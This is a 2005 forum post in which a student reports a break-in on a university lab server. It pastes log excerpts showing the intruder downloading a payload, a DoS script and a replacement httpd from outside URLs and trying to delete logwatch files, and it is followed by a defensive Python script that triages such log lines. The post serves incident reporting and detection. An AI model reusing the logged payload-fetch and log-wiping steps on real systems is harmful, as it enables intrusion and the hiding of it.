Author: Donnie ( XD)
Board: NTUGIEE_EDA
Title: Re: eda.ee
Time: Tue Mar 29 11:15:17 2005
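※ Quoting Donnie ( XD):
: ※ Quoting Donnie ( XD):
: : I got to school this morning and wanted to see which process was acting up.....
: : But fish had already rebooted it XD
: It's confirmed: our computer has been attacked!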
First attack:
Mar 24 05:40:08
Already successfully broken into
Downloaded
http://members.lycos.co.uk/cutegirlrulez/modlib
--05:40:08--
http://members.lycos.co.uk/cutegirlrulez/modlib
=> `modlib'
Resolving members.lycos.co.uk... 212.78.204.20
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36,037 [text/plain]
0K .......... .......... .......... ..... 100% 28.0K
Then they tried to delete logwatch
rm: cannot remove `logwatch.XX4h0y7I': Operation not permitted
rm: cannot remove `logwatch.XXZPy8si': Operation not permitted
rm: cannot remove `logwatch.XXyBBEhX': Operation not permitted
sh: line 1: cd: /tmp/...: No such file or directory
sh: line 1: ./udp.pl: No such file or directory
udp.pl: no process killed
udp.pl: no process killed
cat: sun.pl: No such file or directory
ls: /tmp/hat: No such file or directory
ls: /tmp/ps: No such file or directory
cat: ps.pid: No such file or directory
sh: line 1: ./root: No such file or directory
--08:22:40--
http://www.packetstormsecurity.nl/DoS/udp.pl
=> `udp.pl'
Resolving www.packetstormsecurity.nl... 213.206.75.252
Connecting to www.packetstormsecurity.nl[213.206.75.252]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,089 [text/plain]
0K . 100%
08:22:41 (10.39 MB/s) - `udp.pl' saved [1089/1089]
udp.pl: no process killed
[Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
About to get root privileges!!
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
[Sun Mar 27 15:02:32 2005] [notice] Digest: generating secret for digest authentication ...
[Sun Mar 27 15:02:32 2005] [notice] Digest: done
[Sun Mar 27 15:02:33 2005] [notice] Apache-AdvancedExtranetServer/2.0.48 (Mandrake Linux/6mdk) mod_perl/1.99_11 Perl/v5.8.3 mod_ssl/2.0.48 OpenSSL/0.9.7c PHP/4.3.4 configured -- resuming normal operations
[Sun Mar 27 15:06:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
[Sun Mar 27 15:06:32 2005] [notice] Digest: generating secret for digest authentication ...
[Sun Mar 27 15:06:32 2005] [notice] Digest: done
Replaced apache!
--01:09:42--
http://luksuss.republika.pl/httpd
=> `httpd'
Resolving luksuss.republika.pl... 213.180.128.160
Connecting to luksuss.republika.pl[213.180.128.160]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36,040 [text/plain]
0K .......... .......... .......... ..... 100% 16.1K
01:09:46 (16.13 KB/s) - `httpd' saved [36040/36040]
I'm going to look into which vulnerability it was
Good thing we have a FW, otherwise it could have been even worse!
--
※ Posted from: 批踢踢实业坊 (ptt.cc)
◆ From: 140.112.48.60
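
Added example, not part of the original post: a small triage script that separates normal Apache error-log entries from the wget transcripts and shell error messages mixed in with them, which is the pattern the excerpts above show. It assumes the excerpts come from a single log file read line by line; the function name `triage` and the report layout are made up for this illustration, and the sample lines are copied from the post.

```python
import re

# Apache 2.0 error_log entries look like "[Sun Mar 27 14:57:31 2005] [warn] ..."
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\] \[\w+\] ")
# wget prints "--HH:MM:SS--" before each fetch and "=> `file'" for the saved name
WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s*(\S*)")
WGET_TARGET = re.compile(r"^\s*=> `([^']+)'")
URL = re.compile(r"^https?://\S+$")
# stderr of a shell, coreutils or script invocation: "rm: ...", "sh: line 1: ..."
SHELL_ERR = re.compile(r"^(sh|rm|cat|ls|cd|[\w.]+\.pl): .+")

# Sample lines copied from the post above (most lines omitted)
SAMPLE = """\
--05:40:08--
http://members.lycos.co.uk/cutegirlrulez/modlib
=> `modlib'
rm: cannot remove `logwatch.XX4h0y7I': Operation not permitted
sh: line 1: ./udp.pl: No such file or directory
udp.pl: no process killed
[Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
--01:09:42--
http://luksuss.republika.pl/httpd
=> `httpd'
""".splitlines()


def triage(lines):
    """Split a log excerpt into Apache entries, wget fetches and shell errors."""
    report = {"apache": 0, "downloads": [], "shell_errors": []}
    current = None  # the wget fetch whose URL / file name is still being read
    for line in lines:
        if APACHE_LINE.match(line):
            report["apache"] += 1
            current = None
        elif m := WGET_START.match(line):
            current = {"time": m.group(1), "url": m.group(2) or None, "file": None}
            report["downloads"].append(current)
        elif current and not current["url"] and URL.match(line.strip()):
            current["url"] = line.strip()
        elif current and (m := WGET_TARGET.match(line)):
            current["file"] = m.group(1)
        elif SHELL_ERR.match(line):
            report["shell_errors"].append(line)
    return report


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Any entry under `downloads` or `shell_errors` means a process whose output reaches this log ran shell commands, which is worth an alert on its own. wget prints only the time of day, so the date has to come from the surrounding timestamped entries.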